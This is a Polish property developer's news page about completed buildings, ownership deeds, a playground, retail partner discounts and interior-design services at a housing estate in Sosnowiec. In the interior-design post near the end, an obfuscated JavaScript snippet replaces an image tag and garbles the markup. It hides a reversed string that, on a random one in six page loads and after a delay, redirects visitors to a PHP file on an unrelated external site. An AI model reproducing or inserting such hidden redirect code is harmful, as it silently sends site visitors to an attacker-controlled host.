Kolejny budynek zakończony

Kolejny budynek zakończony

Kolejny budynek został zakończony w terminie. W związku z oddaniem do użytkowania następnego zespołu budynków, informujemy o kompleksowym wykonaniu etapów VI – VIII.

Tym samym, cały trzyklatkowy budynek przy ul. Klimontowskiej 47H-K zyskuje nowych mieszkańców. Niepowtarzalna inwestycja w Sosnowcu “wielkimi krokami” zmierza ku szczęśliwemu końcowi.

Dzięki temu około 90 mieszkań oddaliśmy do użytkowania zgodnie z terminem i przekazaliśmy Państwu zgodnie z umową. Trzy odrębne klatki z windami i garażem podziemnym zostały objęte opieką zarządcy nieruchomości. Jednocześnie aż pięć miesięcy przed wymaganym terminem rozpoczął się proces przenoszenia własności lokali mieszkalnych na naszych klientów. Wyjątkowy apartamentowiec powoli się zapełnia tworząc przyjemną atmosferę dookoła. Nowi właściciele mogą już bezpiecznie wprowadzać się do swoich mieszkań z poczuciem dobrze zainwestowanych pieniędzy. Ustalając indywidualnie, dogodny dla obu stron, termin przekazujemy klucze, niezbędną dokumentację, drobne upominki oraz akt notarialny umowy sprzedaży wraz z ustanowieniem przynależnych służebności.

Zarząd spółki i wszyscy pracownicy życzą w związku z tym właścicielom szybkiej aklimatyzacji w nowych warunkach oraz wielu miłych chwil na naszym unikalnym osiedlu przy ul. Klimontowskiej 47.

Apartamenty Słoneczne - plac zabaw

Akty własności i plac zabaw

Dziś mamy dla Państwa aż dwie, bardzo dobre wiadomości dotyczące takich kwestii jak akty własności i plac zabaw:

Po pierwsze i chyba najważniejsze z punktu widzenia wszystkich kredytobiorców ale nie tylko. Wszyscy lokatorzy z budynku przy ul. Klimontowskiej 47H stali się już właścicielami swoich mieszkań, podpisując akty przeniesienia własności. Kolejny raz udowadniamy, że pomimo zmiennej sytuacji polityczno – gospodarczej, dobra organizacja pracy, pozwala wywiązywać się z postanowień nawet wcześniej, niż określają to warunki umowy deweloperskiej. Tym samym zostały założone księgi wieczyste dla nowopowstałych lokali mieszkalnych, uruchomiono windę, garaż podziemny, a budynek wziął pod opiekę powołany zarządca.

Po drugie informujemy, że następny budynek, tym razem pod adresem ul. Klimontowska 47J, został pomyślnie oddany do użytkowania. Wszyscy nasi  klienci, jeszcze przed wyznaczonym terminem, odbierają klucze do nowych mieszkań przekazywanych w wysokim standardzie wykończenia. Miło nam słyszeć o tym, że doceniają naszą jakość i terminowość wykonania. W najbliższych dniach całą nieruchomość powierzymy pod nadzór zarządcy, który to już zatroszczy się o odpowiednie zabezpieczenie i uruchomienie windy, garażu podziemnego oraz wyczekiwanego zwłaszcza przez młodszych mieszkańców, bajecznego placu zabaw. Wykonawca wraz z inspektorem nadzoru dokonali przeglądu urządzeń i specjalnie przygotowanej, bezpiecznej nawierzchni. Dla rodziców przygotowaliśmy ławeczki i alejki do spacerowania.

Jednocześnie zapewniamy, że to nie koniec zadań związanych z zagospodarowaniem wielofunkcyjnego, unikalnego dziedzica. Dalsze prace rozpoczną się wkrótce ale już dziś wszystkim korzystającym z przygotowanych dotąd atrakcji życzymy udanej zabawy i wiele radości.

Ostatnie, gotowe mieszkania

Tym samym mamy do zaoferowania ostatnie, gotowe mieszkania w oddanym budynku, gdzie z dnia na dzień można je obejrzeć, kupić, i odebrać klucze aby zamieszkać jeszcze przed świętami 🙂 ***

Apartamenty Słoneczne - plac zabaw

 

Przypominamy, że w biurze sprzedaży mieszkań w Sosnowcu przy ul. Plonów 21 bud. B lok. 2, wciąż mamy dla Państwa zaproszenia od naszych partnerów. Do sieci marketów budowlanych OBI i Leroy Merlin dołączył kolejny przedstawiciel branży budowlanej jakim jest sieć sprzedaży podłóg i drzwi Bel-Pol który przygotował m.in. atrakcyjną promocję na montaż paneli. Szczegóły znajdziecie Państwo na stronie: montaż paneli Aurum w cenie.

Do dyspozycji pozostaje oczywiście pracownia “Silesia Wnętrza” oferująca pomoc przy aranżacji, doborze materiałów i wykończeniu mieszkań “pod klucz“.

Wszyscy klienci odebrali swoje mieszkania

Jest nam niezmiernie miło poinformować, że właśnie zakończyliśmy przekazywanie kluczy do mieszkań w budynku przy ul. Klimontowskiej 47H. Tym samym wszyscy klienci odebrali już swoje nowe mieszkania, a budynek decyzją nadzoru budowlanego został pomyślnie oddany do użytkowania.

Jak mówi jeden z przedstawicieli spółki “odbiory kluczy i przekazywanie mieszkań nowym właścicielom to niezwykle ważny element naszej pracy dlatego zawsze podchodzimy do niego z pokorą. Tak było i tym razem”.

Przygotowanie i oddanie budynku do użytkowania wiąże się oczywiście z wykonaniem zagospodarowania terenu i infrastruktury wokół oddawanego segmentu. Jest to niezwykle trudne zwłaszcza kiedy dookoła wciąż trwają inne budowy. Mamy jednak nadzieję, że i te szybko się zakończą, a o uciążliwościach z nimi związanych szybko będzie można zapomnieć, ciesząc się zagospodarowanym dziedzińcem z terenami zielonymi i placem zabaw.

Kiedy już wszyscy klienci odebrali swoje mieszkania przygotowujemy się wraz z Kancelarią Notarialną Łukasz Nowak, Saturnin Ociessa w Sosnowcu do podpisywania aktów notarialnych przeniesienia własności lokali mieszkalnych. Następstwem tego będzie wydzielenie lokali do nowych ksiąg wieczystych. O terminach spotkań u notariusza wkrótce będziemy informowali wszystkich zainteresowanych. Będzie się to wiązało z utworzeniem wspólnoty mieszkaniowej oraz powołaniem zarządcy budynku.

Przypominamy, że w biurze sprzedaży mieszkań w Sosnowcu przy ul. Plonów 21 bud. B lok. 2, wciąż mamy dla Państwa zaproszenia od naszych partnerów. Sieci marketów budowlanych OBI i Leroy Merlin przygotowały dla naszych klientów wysokie rabaty na materiały wykończeniowe i nie tylko. Do dyspozycji pozostają również pracownicy i współpracownicy pracowni “Silesia Wnętrza” oferujący pomoc przy aranżacji, doborze materiałów i wykończeniu mieszkań “pod klucz”.

Przy tej wyjątkowej dla wszystkich okazji życzymy wszystkim naszym nowym i obecnym mieszkańcom samych słonecznych dni i czerpania ogromnej radości z własnych aranżacji mieszkań, prowadzenia prac wykończeniowych oraz z przeprowadzki do swoich nowych Apartamentów Słonecznych przy ul. Klimontowskiej.

Odbierz minimum 600 zł premii

Dla wszystkich, którzy wybrali już mieszkanie z naszej oferty na dowolnym etapie inwestycji, kolejny partner przygotował pakiety rabatów i zniżek na materiały do wykończenia mieszkań. Dlatego jeśli planujesz remont bo dopiero odbierzesz klucze lub przyjdzie Ci do głowy pomysł na zmianę dodatków albo odświeżenie ścian, to ta oferta na pewno Cię zainteresuje.

Dzięki podpisaniu umowy o współpracy z ogólnopolską siecią sklepów OBI każdy obecny i przyszły mieszkaniec inwestycji Apartamenty Słoneczne otrzyma zniżkę dopasowaną do dokonanych zakupów. Jak informuje organizator akcji “Odbierz minimum 600 zł premii od OBI” pakiet remontowy obejmuje zwrot gotówki. Dodatkowo w ramach wręczanego zaproszenia projektanci przygotowali gotowe pomysły na aranżacje mieszkań, które pomogą bezpłatnie dopasować do indywidualnych potrzeb naszych klientów.

Odwiedź nas już dzisiaj lub nie zapomnij zapytać o odbiór zaproszenia przy okazji wizyty na spotkaniu informacyjnym w naszym biurze sprzedaży mieszkań w Sosnowcu przy ul. Plonów 21 lok. B/2.

Zaproszenia zostały przygotowane dzięki uprzejmości sklepu OBI Czeladź przy ul. Będzińskiej 80.

Opiekunem akcji “Odbierz minimum 600 zł premii” jest p. Martyna Piszczek tel. 735 297 764,
email: relacje_pl064@obi.pl

*Szczegóły w regulaminach dostępnych na www.obi.pl i w punktach informacyjnych sklepów.

Apartamenty Słoneczne i OBI – wspólnie tworzymy życiową przestrzeń.

Galeria mieszkania w Sosnowcu

Nie zapłacisz za metry pod ścianami

Czy zastanawiając się nad wyborem nowego domu sprawdzasz cenę za 1 metr kwadratowy? A czy jednocześnie liczysz czy powierzchnia za którą płacisz odpowiada dokładnie tej, którą faktycznie wykorzystasz?

Nie daj się zaskoczyć i nie płać za metry pod ściankami działowymi. Jeśli nie planujesz ich wyburzenia, będzie to przestrzeń za którą sporo dopłacisz. Sprawdź powierzchnię mieszkalną zanim przy odbiorze kluczy okaże się, że przepłaciłeś, a mieszkanie ma mniej metrów niż planowałeś.

Jeśli wybierzesz mieszkanie z oferty inwestycji Apartamenty Słoneczne przy ul. Klimontowskiej w Sosnowcu nie zapłacisz za metry pod ścianami działowymi. Oszczędzisz sporą kwotę, którą możesz przeznaczyć na dowolny cel, np. na wykończenie wnętrza, meble czy sprzęt AGD.

Poniższa ilustracja pokazuje, że przy wyborze nawet niewielkiego mieszkania oszczędzisz aż 9.600 zł.  Z czego to wynika? Dwu lub trzy pokojowe mieszkanie posiada średnio, łącznie ok. 10 metrów bieżących ścianek działowych między pokojami. Przy grubości 16 cm murowanej ścianki z tynkiem, łączna powierzchnia pod ścianami to aż 1,6 m2.

Nie płać za metry pod ścianami

Dlatego też, nie płacąc za nią ani złotówki oszczędzasz pieniądze i zyskujesz przestrzeń dla siebie i rodziny.

Przyjdź do nas… i nie przepłacaj

ponieważ w Apartamentach Słonecznych nie zapłacisz za metry pod ścianami działowymi.

Nowa zaskakująca oferta mieszkań

Budowa postępuje zgodnie z planem, a w zakładce OFERTA jako Etap V pojawiła się już nowa, zaskakująca oferta mieszkań i apartamentów.

W kolejnym etapie mamy do wyboru funkcjonalnie zaprojektowane mieszkania 2, 3 i 4 pokojowe. Nie brakuje również  lubianych udogodnień takich jak: ogród, taras, balkon, miejsca postojowe w garażu podziemnym czy komórki lokatorskie.

Niezmienna pozostaje oczywiście charakterystyczna i unikalna architektura budynków, która poprzez tradycję łączy się z nowoczesnością rozwiązań służących wygodzie i komfortowi mieszkańców. Są to m. in. wentylacja mechaniczna, winda, gaz i instalacja 3-fazowa, nowoczesne, indywidualne ogrzewanie mieszkań jako stałe elementy standardu wykończenia mieszkań oraz  części wspólnych budynku.

Znaczną częścią nowego zagospodarowania terenu będzie wielofunkcyjny dziedziniec. Niestety można go wykonać dopiero po obszernym garażu podziemnym z uwagi na zmiany wprowadzone w miejscowym planie zagospodarowania, dotyczące ilości miejsc postojowych. Wspólna koncepcja powstaje w oparciu o projekt architekta, a całość zostanie zwizualizowana przez pracownię graficzną. Projektant, znany z realizacji funkcjonalnych terenów rekreacyjnych w aglomeracji, ma do dyspozycji sporą przestrzeń pomiędzy istniejącą i nową zabudową.

Już dziś możecie Państwo zadzwonić pod numer 664 431 986 lub napisać na adres rafal@sloneczne.eu aby zarezerwować jedno z naszych nowych mieszkań z Etapu V. Bądźcie czujni bo jak zwykle nowa, zaskakująca oferta mieszkań jest wprowadzana wraz z atrakcyjną  PRZEDSPRZEDAŻĄ. Tu ceny zawsze są niższe.

Wszystkie szczegóły dotyczące harmonogramu prac oraz terminu zakończenia kolejnego już etapu naszej wyjątkowej inwestycji przy ul. Klimontowskiej są dostępne w biurze sprzedaży mieszkań przy ul. Plonów 21 w Sosnowcu. Serdecznie zapraszamy

 

Odbierz rabat w Leroy Merlin

Zarezerwowałeś lub kupiłeś mieszkanie w naszej inwestycji, planujesz remont lub dopiero odbierzesz klucze? Być może już za chwilę staniesz przed wyzwaniem zaprojektowania, wykończenia i urządzenia swojego nowego mieszkania? Wiemy doskonale, że jest to nie lada wyzwanie, które jednych przeraża, a drugich stawia w roli bohatera. Gdy jednak przyjdzie Wam się z nim zmierzyć lub akurat nabraliście ochoty na zmianę dodatków albo odświeżenie ścian, to mamy dla Was coś specjalnego.

Dzięki współpracy dewelopera z siecią sklepów Leroy Merlin, każdy obecny i przyszły mieszkaniec inwestycji Apartamenty Słoneczne otrzyma rabat w wysokości aż 10%. Planując remont może darmowo uzyskać fachową pomoc w aranżacji mieszkania. Poprosić o pomoc projektanta wnętrz oraz nabyć dowolne produkty z całego asortymentu sklepu (budowa, remont, ogród, dodatki). Oferta obejmuje wszystkie towary zarówno w cenie podstawowej jak i te przecenione.

„Zdajemy sobie sprawę, że każdy ma inne potrzeby i dlatego promocja ma tak szeroki zakres” – podpowiada organizator akcji. Promocja dotyczy całodziennych zakupów w ogólnopolskiej sieci marketów budowlanych.

Już dzisiaj wstąp do nas i odbierz swój rabat* na zakupy w Leroy Merlin. W naszym biurze sprzedaży w Sosnowcu przy ul. Plonów 21 są do odebrania specjalne zaproszenia przygotowane dzięki uprzejmości sklepu Leroy Merlin Sosnowiec przy ul. Zuzanny 26.

Opiekunem akcji jest p. Mariusz Woźniak tel. 516 344 758, email: to:mwozniak@leroymerlin.pl”>mwozniak@leroymerlin.pl

*Szczegóły w regulaminach dostępnych na www.leroymerlin.pl i w punktach informacyjnych sklepów.

Apartamenty Słoneczne i Leroy Merlin – wspólnie pomożemy w realizacji Twoich marzeń!

Miejsce w którym chce się mieszkać

Miejsce w którym chce się mieszkać

Tym razem zapraszamy Państwa do lektury artykułu z Dziennika Zachodniego. Autor opisuje w nim miejsca, w których zdaniem mieszkańców Sosnowca, dobrze się mieszka a oferta mieszkań spełnia ich oczekiwania w stosunku jakości do ceny. Apartamenty Słoneczne przy ul. Klimontowskiej, jak zawsze, znajdują się w gronie liderów jako miejsce, w którym aż chce się mieszkać.

Autor artykułu w kilku zdaniach docenia walory naszej inwestycji: “Mieszkańcy tego osiedla w Nowym Klimontowie mogą cieszyć się spokojem od miejskiego zgiełku. Jednocześnie jest tutaj blisko do centrum. W mieszkaniach znajduje się kilka pokoi, a także obszerne tarasy i balkony. A te z mieszkań, które mieszczą się na parterze mają ogródek. Wiele z mieszkań w najnowszym IV etapie jest już sprzedana bądź zarezerwowana.”

Sam tekst jest o tyle cenny, że nie jest artykułem sponsorowanym. Wprost wskazuje naszą inwestycję jako miejsce modne i popularne, w którym aż chce się mieszkać w Sosnowcu. Oczywiście chciałoby się opisać przy tej okazji znacznie więcej, gdyż sam standard wykończenia naszych mieszkań zawiera ok. 20 konkretnych punktów, nie mówiąc o atutach budynku, zastosowanych technologiach i samej lokalizacji. Nic jednak straconego bo w rezultacie chętnie odpowiemy na wszystkie ewentualne pytania. Pozostałe zalety poznacie Państwo w naszym biurze sprzedaży mieszkań w Sosnowcu przy ul. Plonów 21.

Zapraszamy do kontaktu telefonicznego aby umówić się na niezwykle interesujące spotkanie, którego nie możecie przegapić. Podsumowując, może ono okazać się szczególnie owocne w okresie wakacyjnym, kiedy chętniej układamy plany na drugą połowę roku.

Z uwagi na okres urlopowy w terminie między 13 a 24 lipca, biuro będzie przyjmowało jedynie pilne zgłoszenia mailowe. Tym samym już od 27 lipca wracamy do Państwa ze zdwojoną energią do pracy.

Zostawiamy Państwa z miłą refleksją, gdzie warto zamieszkać, chcąc wybrać dla siebie nowe, atrakcyjne miejsce w naszym mieście.

Nowe mieszkania w Sosnowcu zgodnie z planem

Nowy budynek przy ul. Klimontowskiej ma już dach, okna i większość elewacji zewnętrznych. W środku są już tynki i wylewki w mieszkaniach, drzwi wejściowe oraz wszystkie instalacje. Obecne prace głównie skupiają się na wykończeniu ciągów komunikacyjnych i zagospodarowaniu terenu. Zgodnie z zapewnieniami dostawcy, wkrótce na balkonach mają pojawić się balustrady. Dziś wszystko wskazuje na to, że nowe mieszkania w Sosnowcu powstaną zgodnie z planem. Zapraszamy do regularnego odwiedzania naszej galerii, gdzie zawsze można znaleźć coś interesującego, co dotyczy budowy lub samych mieszkań. Ostatnio pojawił się tam film wykonany przez firmę Olczyk & Grab Studio Form z Siemianowic Śląskich przedstawiający ciekawy projekt naszego, obszernego salonu. Jeśli ktoś chce to może oczywiście bezpłatnie wykorzystać ten pomysł ale p. Dominika, która odpowiada za projekty, zaprasza Państwa do kompleksowej współpracy.

3 etap inwestycji zakończony

Miło jest nam poinformować, iż nowy budynek otrzymał prawomocną decyzję o pozwoleniu na użytkowanie. Tym samym sprawdzony deweloper oficjalnie oddał następną część budowy inwestycji Apartamenty Słoneczne i 3 etap można uznać za zakończony. Lokatorzy odebrali już klucze do swoich mieszkań i aby wspólnota mogła swobodnie funkcjonować, nowy Zarządca wkrótce przekaże części wspólne.

Wszyscy nowi właściciele zostali poinformowani o terminach podpisywania aktów notarialnych umów sprzedaży. W szczególnych przypadkach i na prośbę niektórych osób niektóre czynności notarialne udało się szybciej przeprowadzić. Akt notarialny umowy sprzedaży jest równoznaczny z przeniesieniem własności lokalu mieszkalnego na nabywcę. Jednocześnie na wniosek notariusza wyodrębniony lokal otrzymuje własną księgę wieczystą oraz numer w ewidencji.

Oczywiście to, że 3 etap został zakończony nie oznacza wcale końca budowy dla tej najpopularniejszej obecnie inwestycji w Sosnowcu. Przy ul. Klimontowskiej jest już doskonale widoczna budowa 4 etapu, w którym powstają nowe mieszkania. Oferta kusi nie tylko atrakcyjnymi cenami ale przede wszystkim przemyślanym projektem i wspaniałą lokalizacją.

Piec kondensacyjny w standardzie

Pomimo, że ładna pogoda wciąż dopisuje to nasze nowe mieszkania w Apartamentach Słonecznych są już gotowe na sezon grzewczy. Mają już zamontowane grzejniki i termostaty oraz oryginalny i nowoczesny – piec kondensacyjny marki De Dietrich.  Jak wskazuje sam producent: logo De Dietrich to symbol jakości od 1778 roku i jest najstarszym znanym znakiem przemysłowym. Sam Król Ludwika XVI wydał dekret na pamiątkę połączenia rogu łowieckiego z nazwą firmy. Ma to na celu zabezpieczenie wyrobów firmy De Dietrich przed ich podróbkami.

Piec kondensacyjny kocioł MCR Home charakteryzuje się mniejszym zapotrzebowaniem na energię dostarczaną w postaci gazu dzięki technologii kondensacji, konstrukcji minimalizującej straty ciepła, wykorzystaniu wydajnej pompy elektronicznej, a także pokojowych regulatorów temperatury, dostępnych jako wyposażenie dodatkowe. Po szczegółowe informacje odsyłamy jednak do strony producenta: https://dedietrich.pl/mcr-home/

Kolejne nowe mieszkania w Sosnowcu czekają już w stanie deweloperskim na pozytywną decyzję nadzoru budowlanego. Protokół odbioru mieszkania, który zawiera opisany, razem z kluczami do mieszkania, przekaże deweloper.

Silesia wnętrza – urządzamy z przyjemnością

Zaprzyjaźniona pracownia projektów wnętrz, jak zwykle, miło zaskakuje. Przedstawiamy najnowsze wizualizacje aranżacji naszych salonów z aneksem kuchennym. Prawda, że piękne… możecie Państwo korzystać z ich pomysłowości do woli, a w razie pytań odsyłamy na nową stronę biura projektowego: www.silesia-wnetrza.pl

Aby umówić się na konsultację projektant udostępnił dla Państwa numer tel. 602 669 390.

Aby urządzanie mieszkania było prawdziwą przyjemnością…

Darmowe konsultacje

Nasza oferta wzbogaciła się o nową usługę. Tym samym nasi specjaliści pomogą Ci wybrać mieszkanie, załatwić pewny kredyt, wykończyć je i urządzić “pod klucz”. Ty tylko odbierasz klucze. Przyjdź i przekonaj się jakie to proste…

Zdajemy sobie sprawę jak trudno nieraz zaplanować funkcjonalny wystrój wnętrza. A jeśli nawet już wiemy jak chcieli byśmy mieszkać to pojawiają się kolejne pytania gdzie “to” kupić, kto nam “to” zrobi i ile “to” kosztuje? Postanowiliśmy pomóc Państwu i w tym zakresie. Nawiązaliśmy współpracę z firmą “Silesia Wnętrza”, która profesjonalnie zajmuje się projektowaniem i wykańczaniem wnętrz “pod klucz“.

Jednocześnie informujemy, że w ramach podpisanej umowy deweloperskiej, każdy ma możliwość darmowej konsultacji z projektantem wnętrz. W przypadku kontynuacji współpracy otrzyma kompleksowy projekt, wizualizacje, zestawienie materiałów, sprawdzoną firmę wykończeniową, a nawet fachowy nadzór nad przebiegiem prac remontowo – wykończeniowych w swoim mieszkaniu.

Poniżej przykładowy wystrój dla mieszkania o pow. 60,76m2 przygotowany przez Silesia Wnętrza.

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}towska-01-1-600×418.jpg” alt=”” width=”600″ height=”418″ /> Apartamenty Słoneczne 3 etap – przykładowa aranżacja wnętrza

 

Akty notarialnej sprzedaży mieszkań

W związku z zakończeniem budowy segmentu projektowego K, wszyscy nasi klienci mogą już podpisywać notarialne umowy zakupu swoich mieszkań. Jak zawsze, zaufana kancelaria notarialna rejentów Nowak – Ociessa stanęła na wysokości zadania i zarezerwowała dla nas i naszych klientów prawie wszystkie swoje wolne terminy w kancelarii.  Dzięki temu klienci niezwłocznie otrzymują akty własności, a mieszkania przy ul. Klimontowskiej 47E indywidualne księgi wieczyste.